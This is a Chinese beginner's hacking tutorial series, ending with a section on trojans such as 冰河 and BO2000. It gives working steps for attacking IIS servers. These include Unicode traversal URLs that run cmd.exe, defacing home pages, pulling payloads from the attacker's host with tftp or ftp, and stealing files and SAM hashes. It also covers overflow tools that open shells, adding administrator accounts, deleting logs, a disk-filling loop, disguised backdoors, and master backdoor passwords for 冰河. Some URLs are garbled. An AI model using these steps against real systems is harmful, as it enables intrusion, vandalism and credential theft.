  中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

   -〉 (0xc1 - 0xc0) * 0x40 + 0x1c=0x5c='/'

  / -〉 (0xc0 - 0xc0) * 0x40 + 0x2f=0x2f='\'

  在NT4中/编码为

  在英文版里: WIN2000英文版

  在中文win2k里:

  此外还有多种编码,不一一阐述。

  本文例子均以win2k为准,其他类型请自行替换。

  基础知识(3)

  二,一切从基础开始

  由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd.exe/c+dir

  学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

  如果成功,那么在浏览区可看到如下信息:

  Directory of C:\inetpub\scripts

  2000-09-28 15:49 〈DIR〉 .

  2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

  是不是有自己机器的感觉了,正点!就是这种感觉!

  cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

  http://11.11.22.22/msadc/..%1... em32/cmd.exe/c+dir (这个命令同样道理)

  大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd.exe/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

  会dos的朋友一定懂其意义了,不懂的请去看书 .

  不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

  三,实战演练

  1,修改主页!(是不是很爽?)

  一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。

  最方便的方法:在浏览器里输入http://11.11.22.22/.ida要是有漏洞,那在浏..皇俏颐堑氖籽 /a>

  分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

  dir/s 法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

  找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

  那么我们就修改它吧!

  最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd.exe/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

  回应为:HTTP 500 - 内部服务器错误

  通过对cmd的分析,袁哥得出一条简便的方法,加入"符号

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd".exe/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd".exe/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

  回应为:cgi错误,不用理会

  两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

  而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

  例如:11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd.exe/c+copy+cmd.exe+c:\a.exe

  11.11.22.22/scripts/..https://blog.csdn.net/newbie_xymt/article/a.exe/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

  2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页

  

  基础知识(4)

  上传,这个我们后面介绍。

  几点忠告:

  1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

  2,echo前记得帮他们做好备份

  3,不准在主页里加入恶性语句

  2,下载文件

  要是有什么有用的文件被你发现,那我们如何下载呢?

  最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。

  别的方法:对不起,没想好:)

  3,最重要的上传

  一般方法:ftp法

  首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧

  echo+open ftp.cshu.com(ftp主机) > c:\hehe.haha

  echo+user yourname >> cc:\hehe.haha (yourname是用户名)

  echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

  echo+get setup.exe >> c:\hehe.haha 要下载的文件

  echo+quit >> c:\hehe.haha

  完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)

  别忘了先上传到ftp主机,不要做马大哈哦!

  最简单的方法:tftp法。

  这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

  在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

  安装好后运行,别忘了设置好默认目录,否则会找不到文件

  tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)

  1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!

  学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

  4,如何清除痕迹

  虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

  C:\winnt\system32\logfiles\*.*

  C:\winnt\ssytem32\config\*.evt

  C:\winnt\system32\dtclog\*.*

  C:\winnt\system32\*.log

  C:\winnt\system32\*.txt

  C:\winnt\*.txt

  C:\winnt\*.log

  全……擦掉!

  四,细节问题。

  1,遇到长文件名怎么办?

  c:\program files\

  就用c:"program20%files"\

  2,遇到空格怎么办?

  %代替喽,或者xx yy=xxyy~1

  基础知识(5)

  %代替喽,或者xx yy=xxyy~1

  3,如何做个很大的文件?

  目的就是破坏啦!我不喜欢不过教教你们啦

  @echo off

  echo big > c:\a.a

  :h

  copy c:\a.a+c:\a.a c:\a.a

  goto h

  注意不要乱来啊!

  4,输入命令,没反应或反应不对。

  :)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!

  http://www.exsample.com/scripts/... macr;..à

  ˉhttps://blog.csdn.net/newbie_xymt/article/winnt/system32/cmd.exe/c+dir+c :\ 或http://www.exsample.com/msadc/..... 2/cmd.exe/c+dir+c:\ 或http://www.exsample.com/_vti_bin... 2/cmd.exe/c+dir+c:\ 或http://www.exsample.com/_mem_bin... 2/cmd.exe/c+dir+c:\

  不一定有用哦!

  5,如何找到unicode漏洞的主机

  呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

  不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

  6,我copy,del文件,怎么显示aceess denined

  这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!

  这个我会在今后介绍,现在你可以试试attrib

  attrib -r -h -s c:\autoexec.bat

  再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!

  7,我黑了主页,天下无敌?

  我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口

  echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!

  对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!

  要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择

  8,我如何做更多的事?

  第一,努力提高权限

  第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!

  一,frontpage扩展攻击。

  为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!

  具体做法:

  1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

  2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。

  3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入http://11.11.22.22(我习惯用这个做例子,以...僮魍澄募恕/a>

  4,万一跳出错误信息,表示有密码(这个不算注意文明用语)这时我们试着用以下url,http://11.11.22.22/_vti_pvt/service.pwd,这...盎箍梢愿耐场/a>

  我的看法:

  这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。

  二,iis.printer溢出攻击

  据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!

  具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的!

  由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。

  具体方法:

  1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。

  2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。

  3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的说明) ( shell口)

  例如:iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)

  4,用nc或telnet连上,nc/telnet 11.11.22.22 111,成功的话就可以控制机器了,加个用户,做个代理……

  我的看法:

  这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。

  三,idq/ida漏洞溢出攻击

  这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。

  具体方法:

  1,准备snakeiis溢出程序。可以从本站下载。

  2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。

  3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。

  4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)

  5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。

  6,重复4,很快一台新鲜的win2k被你控制了!

  我的看法:

  我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。

  四,*bsd telnetd溢出攻击

  又是溢出,不过这个可是真正的热点哦,最近红盟等大型安全网站被黑就是因为这个!所以看看吧

  具体方法:

  1,使用fbsdhack for win2k来攻击,本站有下载的

  2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。

  3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡

  4,有幸成功了,记得请我吃饭!

  我的看法:

  这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!

  五,密码暴力破解

  这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。

  具体方法:

  1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。

  2,找到一台相应的主机。

  3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!

  4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧

  大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。

  这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧!

  不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。

  在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。

  首先说说最简单的:system to admin

  当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:

  net user 察看用户表 net user username pass /add(添加密码为pass的用户username)

  net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

  net use \\ip\ipc$ "password" /user:username 这是远程连接的命令

  假如我们溢出了11.11.22.22,那么这样做吧!

  net user (看到了iusr_machinename的用户了,它一般没什么权限的)

  

  基础知识(6)

  net user iusr_machinename cshu (把它的密码设为cshu)

  net localgroup administrators iusr_machinename /add(加入administrators组)

  这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!

  熟悉一下net use 命令:

  net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接

  copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘

  net time \\11.11.22.22 看到了时间了,比如是8点

  at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。

  net use \\11.11.22.22 /delete 断开连接

  应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)

  是不是很简单?所以我是溢出是很厉害的攻击方法。

  3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)

  总的来说,还是unicode的机器最多,为什么注意文明用语网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。

  首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。

  1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。

  拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。

  2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!

  3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)

  4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!

  5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documents and settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.

  6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。

  总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)

  想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。

  那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!

  这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.TT86绿色上网!)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。

  今天说点什么呢?没有主题,乱谈一通吧!

  首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。

  我来说说我自己觉得最有用的几个项目:

  1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。

  remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)

  remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!

  remote ftp sam -x 拿sam的,还是用最好的lc3来解吧!

  frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点,http://ip就可以了!(http://不要忘)

  此外还有一点变通,大家肯定读的懂的。

  2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。

  3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!

  总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。

  然后我想说说一些黑站的经验。

  ☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。

  上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!

  推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)

  最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)

  ☆ 我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!

  我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?

  ☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:

  net start termservice 启动win2k的终端控制

  net start workstation 打开net use 功能

  net start lanmanserver 打开ipc

  net start eventlog 启动日志(你不会那么傻吧!stop)

  net start schedule 打开计划(at)

  net start server 共享

  还有很多,net命令里去找吧!

  ☆打开telnet

  1,远程去运行ntlm.exe,流光里有

  2,net stop telnet

  3, net start telnet

  ☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!

  至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!

  ☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。

  具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。

  做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!

  要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。

  最后说说一些对于菜鸟同志的建议:

  不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……

  不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。

  不要和被你黑的网管过多接触,前车之鉴哦。

  对于一台好机器要做好后门,不要轻易失去它。

  想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧!

  实践是最好的教程,再次重申!

  应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。

  编程技术……好像太难了,不过再难也要学。

  想不出来了………………

  好了,我们的菜鸟操终于结束了,我这个大菜鸟也可以退休了,拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站,不知道大家是否成功了,不管这么样,我们都该不断的努力学习,不是吗

  

  黑客常用兵器之木马篇(上)

  “我知道远程控制是种武器,在十八般兵器中名列第七,木马呢”

  “木马也是种武器,也是远程控制。”

  “既然是远程控制,为什么要叫做木马?”

  “因为这个远程控制,无论控制了什么都会造成离别。如果它钩住你的E-Mail,你的E-Mail就要和你离别;如果它钩住你的QQ,你的QQ就要和你离别。”

  “如果它钩住我的机器,我就和整个网络离别了”

  “是的。”

  “你为什么要用如此残酷的武器”

  “因为我不愿被人强迫与我所爱的人离别。”

  “我明白你的意思了。”

  “你真的明白”

  “你用木马,只不过为了要相聚。”

  “是的。”

  一

  在众多的黑客武器中特洛伊木马(Trojan horse)这种攻击性武器无论是菜鸟级的黑客爱好,还时研究网络安全的高手,都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具,木马的威力要比其他的黑客工具大得多。

  “木马既然如此有效,为何在Hacker兵器谱中排名靠后?”

  “因为使用木马往往不是很光明正大。”

  “哦?为何?”

  “在使用木马的人群中菜鸟黑客居多,他们往往接触网络不久,对黑客技术很感兴趣,很想向众人和朋友显示一番,但是去驾驭技术不高,不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现,多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了,他们通常会在得到一个服务器权限的时候植入自己编写的木马,以便将来随时方便进出这台服务器。”

  “但如此一来木马的名声不就随之降低了吗?”

  “是的,所以现在的黑客高手都耻于用木马,更耻于黑个人的计算机。”

  “不过木马在很多人的眼中仍然是一等一的绝好兵器。”

  在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的,但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品,BO2000的这个功能无疑对Windows NT来说是致命的,就Windows NT本身而言,由于硬盘采取了NTSF的加密,普通的木马,包括冰河也无法控制,当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。

  而正因为如此BO2000才深得黑客高手的喜爱,因为他们感兴趣的也只有服务器,也只有Web Server才能够提起他们的胃口,那是一种来自深层感官的刺激。

  通常情况下木马大致可分为两个部分:服务器端程序和客户端程序。服务器端通常就是被控制端,也是我们传统概念上的木马了。

  二

  “你说BO2000好,但是绝大多数的杀毒招数都能够沟将其制服,而且我感觉他在使用上不如我手里的冰河锐利,况且我也不想黑什么服务器。我认为,个人电脑中隐藏有更大的宝藏,而且个人电脑脆弱的我能够利用任何一种方法摧毁它。

  “你说的很对,冰河确实锐利,而且称霸中华江湖一年之久,也可谓武林中少见的好兵刃,但是兵器虽然锋利,但兵器在打造的时候却留下来一个致命的缺点,这也是木马冰河为何在武林衰败的原因。”

  “这是一个什么样的弱点那?竟然如此致命?”

  “呵呵,说白了也很简单,冰河的作者在打造冰河2.X版本时就给它留下了一个后门,这个后门其实就是一个万能密码,只要拥有此密码,即便你中的冰河加了密码保护,到时候仍然行同虚设。”

  “什么!真有此事?想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用,如此这般,他们的机子岂不暴露无遗?”

  “呵呵,在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么,多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手,致命的一招。冰河的作者当然也不例外,而且由于作者钟爱许美静,所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”

  “噢?万能密码?”

  “通常黑客在植入冰河这种木马的时候,为了维护自己的领地通常的要为自己的猎物加一个密码,只有输入正确的密码你才能够正常的控制对方的计算机,但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码,就像万能钥匙一样。冰河各版本的通用密码:

  2.2版:Can you speak Chinese

  2.2版:05181977

  3.0版:yzkzero!

  4.0版:05181977

  3.0版:yzkzero.TT86绿色上网!

  3.0版:yzkzero!

  3.1-netbug版密码: 123456!@

  2.2杀手专版:05181977

  2.2杀手专版:dzq20000!

  你可以试试看,是不是很轻松的就能够进入任何一台有冰河服务器端的电脑?”

  “真的进入了,果然有此事情,怪不得现在很多人都不再使用冰河。”

  “此外冰河还存在着两个严重的漏洞:

  漏洞一:不需要密码远程运行本地文件漏洞。

  具体的操作方法如下:我们选择使用相应的冰河客户端,2.2版以上服务端用2.2版客户端,1.2版服务端需要使用1.2版客户端控制。打开客户端程序 G_Client,进入文件管理器,展开“我的电脑”选中任一个本地文件按右键弹出选择菜单,选择“远程打开”这时会报告口令错误,但是文件一样能上传并运行。

  任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了,如果你高兴的话,还可以上传病毒和其它的木马。

  漏洞二:不需要密码就能用发送信息命令发送信息,不是用冰河信使,而是用控制类命令的发发送信息命令。”

  “当然这的确是一个原因,但更主要的是现在的多数杀毒软件都能克制冰河。”

  三

  木马通常会在三个地方做手脚:注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件,绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马,木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上,可以捆绑到启动程序上,也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上,启动是不确定的,这要看目标电脑主人了,如果他不运行,木马就不会进入内存。捆绑方式是一种手动的安装方式,一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹,所以,很容易被发现,而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等,位置的多变使木马有很强的隐蔽性。

  “在众多木马中,大多数都会将自己隐藏在Windows系统下面,通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。”

  “众多的目录中为何选择这两个目录?”

  “呵呵,当然是为了便于隐蔽。通常这几个目录为计算机的系统目录,其中的文件数量多而繁杂,很不容易辨别哪些是良性程序哪些是恶性程序,即便高手往往也会有失误删除的情况。而且,即便放置在系统目录下,就多数为重要的文件,这些文件的误删除往往会直接导致系统严重的瘫痪。”

  “原来如此。”

  “前辈,木马冰河是否也做了这些手脚?”

  “这是自然,木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先,冰河会在你的注册表中的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和 RUNSERVICE 键值中加上了\kernl32.exe(是系统目录),

  §c:\改动前的RUN下

  默认=""

  §c:\改动后的RUN下

  默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"

  §c:\改动前RunServices下

  默认=""

  §c:\改动后RunServices下

  默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"

  §c:\改动前[  HKEY_LOCAL_MACHINE\Software\CLASSES xtfile\shell\open\command]的:

  默认="Notepad.exe %1"

  §c:\改动后[  HKEY_LOCAL_MACHINE\Software\CLASSES xtfile\shell\open\command]的:

  默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1"

  可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe,而且冰河服务器端的编制是加密的,没法简单的通过改注册表得到或换掉。另外值得一提的是,即便你删除了这个键值,也并非平安大吉,冰河还会随时出来给你捣乱,主要因为冰河的服务端也会在c:\ windows目录下生成一个叫 sysexplr.exe文件,当然这个目录会随你windows的安装目录变化而变化。

  “这个文件名好像超级解霸啊,冰河竟然如此狠毒。”

  “哈哈哈哈,你说的很对,也很聪明,这个文件的确很像超级解霸,但是这还是不够称得上为阴险,最为阴险的是这个文件是与文本文件相关联的,只要你打开文本,sysexplr.exe程序就会重新生成一个krnel32.exe,此时你的电脑还是被冰河控制著。而且如果你失误将sysexplr.exe程序破坏,你计算机的文本文件将无法打开。”

